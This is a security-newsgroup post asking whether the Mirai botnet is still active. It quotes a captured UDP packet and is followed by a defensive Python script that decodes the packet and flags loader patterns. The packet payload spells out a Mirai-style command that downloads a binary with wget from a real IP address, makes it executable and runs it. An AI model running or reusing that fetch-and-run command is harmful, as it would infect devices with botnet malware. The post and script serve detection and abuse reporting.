
Mirai botnet

From Marc SCHAEFER <schaefer@alphanet.ch>
Newsgroups rocksolid.shared.security
Subject Mirai botnet
Date 2023-02-04 16:18 +0000
Organization Posted through news.alphanet.ch
Message-ID <trm0gu$6n4$1@shakotay.alphanet.ch> (permalink)



Hello,

is the Mirai botnet still active?

I got a few datagrams like this lately (dest address anonymized)

09:27:22.916608 IP (tos 0x0, ttl 245, id 54321, offset 0, flags [none], proto UDP (17), length 136)
    107.189.12.152.47159 > 1.2.3.4.9034: [no cksum] UDP, length 108
        0x0000:  4500 0088 d431 0000 f511 0176 6bbd 0c98  E....1.....vk...
        0x0010:  0102 0304 b837 234a 0074 0000 6f72 663b  .....7#J.t..orf;
        0x0020:  6364 202f 746d 703b 2072 6d20 2d72 6620  cd./tmp;.rm.-rf.
        0x0030:  6d70 736c 3b20 2f62 696e 2f62 7573 7962  mpsl;./bin/busyb
        0x0040:  6f78 2077 6765 7420 6874 7470 3a2f 2f31  ox.wget.http://1
        0x0050:  3034 2e32 3434 2e37 322e 382f 6875 616d  04.244.72.8/huam
        0x0060:  7073 6c3b 2063 686d 6f64 202b 7820 6875  psl;.chmod.+x.hu
        0x0070:  616d 7073 6c3b 202e 2f68 7561 6d70 736c  ampsl;../huampsl
        0x0080:  206d 7073 6c3b 2023                      .mpsl;.#

Shall I assume that:

   - 107.189.12.152 is probably spoofed, because UDP, and so I should
     not report it?

   - 104.224.72.8 should be reported, especially since it really hosts
     the URL http://104.224.72.8/huamsl and after manual download, this
     is seen as Mirai by an online virus detector?

Is it the real Mirai, and do you also see attempts like this, or is
it maybe a targeted attack?

-- 
Attention: keep the number of quoted lines to the essential, otherwise
I will not see your reply. And if you often write nonsense, I will stop
reading you and will recommend (NoCeM) that others stop reading you too.
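
A defender-side check for the datagram above, added here as an example (it is not the poster's code): it rebuilds the bytes from the tcpdump -X lines, decodes the IPv4/UDP headers, and flags the payload's "cd /tmp; fetch; chmod +x; run" pattern, keeping the forgeable IP-layer source separate from the URL host the bot is told to fetch from. The function and field names (`dropper_host`, `is_loader`) are my own and nothing is downloaded.

```python
import re
import struct
from urllib.parse import urlparse
# The datagram quoted in the post (tcpdump -X output, IP header first); only parsed, never contacted.
HEXDUMP = """\
0x0000:  4500 0088 d431 0000 f511 0176 6bbd 0c98  E....1.....vk...
0x0010:  0102 0304 b837 234a 0074 0000 6f72 663b  .....7#J.t..orf;
0x0020:  6364 202f 746d 703b 2072 6d20 2d72 6620  cd./tmp;.rm.-rf.
0x0030:  6d70 736c 3b20 2f62 696e 2f62 7573 7962  mpsl;./bin/busyb
0x0040:  6f78 2077 6765 7420 6874 7470 3a2f 2f31  ox.wget.http://1
0x0050:  3034 2e32 3434 2e37 322e 382f 6875 616d  04.244.72.8/huam
0x0060:  7073 6c3b 2063 686d 6f64 202b 7820 6875  psl;.chmod.+x.hu
0x0070:  616d 7073 6c3b 202e 2f68 7561 6d70 736c  ampsl;../huampsl
0x0080:  206d 7073 6c3b 2023                      .mpsl;.#
"""

def parse_hexdump(dump):
    """Rebuild the raw packet from tcpdump -X lines: offset, up to eight 4-hex-digit words, ASCII column."""
    out = bytearray()
    for line in dump.splitlines():
        words = []
        for tok in line.split(":", 1)[-1].split():  # drop the offset; its ':' is the first one on the line
            if len(words) == 8 or not re.fullmatch(r"[0-9a-f]{4}", tok):
                break  # reached the ASCII column
            words.append(tok)
        out += bytes.fromhex("".join(words))
    return bytes(out)

def decode_ipv4_udp(pkt):
    """Pull addressing fields and the UDP payload out of an IPv4/UDP packet (raises on anything else)."""
    ver_ihl, _, _, ident, _, ttl, proto, _, src, dst = struct.unpack("!BBHHHBBH4s4s", pkt[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or proto != 17:
        raise ValueError("not IPv4/UDP")
    sport, dport, ulen, ucksum = struct.unpack("!HHHH", pkt[ihl:ihl + 8])
    return {"src": ".".join(map(str, src)), "dst": ".".join(map(str, dst)), "ip_id": ident, "ttl": ttl,
            "sport": sport, "dport": dport, "udp_len": ulen, "udp_cksum": ucksum,  # 0 == tcpdump's "[no cksum]"
            "payload": pkt[ihl + 8:ihl + ulen]}

def find_loader_indicators(payload):
    """Flag the 'cd /tmp; fetch; chmod +x; run' dropper stage and extract the host the bot is told to fetch from."""
    text = payload.decode("ascii", errors="replace")
    urls = re.findall(r"https?://[^\s;]+", text)
    checks = {"cd_tmp": r"\bcd\s+/tmp\b", "fetch": r"\b(?:wget|tftp|curl)\b",
              "chmod_x": r"\bchmod\s+\+x\b", "run_dropped": r"\./\S+"}
    hits = {k: bool(re.search(p, text)) for k, p in checks.items()}
    # The IP-layer source of a lone UDP datagram can be forged; the URL host cannot, since the bot must reach it.
    return {"urls": urls, "dropper_host": urlparse(urls[0]).hostname if urls else None,
            **hits, "is_loader": all(hits.values())}
```

Running `find_loader_indicators(decode_ipv4_udp(parse_hexdump(HEXDUMP))["payload"])` reports the download host to consider for an abuse report, while the decoded source address stays a separate, unverified field.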
